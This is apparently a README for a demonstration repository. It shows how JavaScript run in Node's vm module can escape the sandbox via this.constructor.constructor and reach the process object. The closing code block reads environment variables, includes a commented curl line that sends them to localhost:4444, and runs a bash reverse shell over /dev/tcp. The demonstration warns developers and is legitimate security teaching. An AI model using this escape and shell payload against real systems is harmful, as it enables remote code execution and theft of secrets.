# break-out-of-node-vm-sandbox

The Node `vm` library is sometimes used by developers as a "safe" way to `eval()` code.  [Even though the documentation explicitly says not to do so](https://nodejs.org/docs/latest-v14.x/api/vm.html)

The example below shows how the `process` object can be accessed from the `vm` to access sensitive information, and can then be used to exfiltrate or even RCE.

```javascript

const vm = require('vm');

const sandbox =  {};
const context = vm.createContext(sandbox);

// Sandbox normally prevents access to process
try  {
    const safe = vm.createScript("env = process.env;");
    safe.runInContext(context);
    console.log(context.env);
} catch (e) {
    console.log("Could not directly access process object")
}

// Even trying to escape with `eval` is blocked
try  {
    const safe = vm.createScript("process = eval('process')");
    safe.runInContext(context);
    console.log(context.procecss);
} catch (e) {
    console.log("Could not access process object from eval");
}

// Vulnerable -
// However using root function's eval method gets access to process object
try  {
    const unsafe = vm.createScript(
        "process = this.constructor.constructor('return this.eval(`process`)')();"
    );
    unsafe.runInContext(context);
    console.log("Access granted", context.process.env.USER);
} catch (e) {
    console.log("This won't cause an error");
}

// The sandbox also prevents access to global functions like `require`
try  {
    const safe = vm.createScript("require('https');");
    safe.runInContext(context);
} catch (e) {
    console.log("Could not access `require` function");
}

// Vulnerable -
// However, by calling  mainModule from the process object, one can access require object for full RCE
try {
    const unsafe = vm.createScript(` 
        process = (this.constructor.constructor('return this.eval("process")')());
        env = encodeURIComponent(JSON.stringify(process.env));

        // Uncomment to exfiltrate environment variables using curl
        //process.mainModule.require('child_process').exec('curl localhost:4444?'+env); 
        
        // Even start a reverse shell
        process.mainModule.require('child_process').exec('bash -i >& /dev/tcp/localhost/4444 0>&1');
    `);
    unsafe.runInContext(context);
} catch (e) {
    console.log("This wouldn't cause an exception either");
}

```
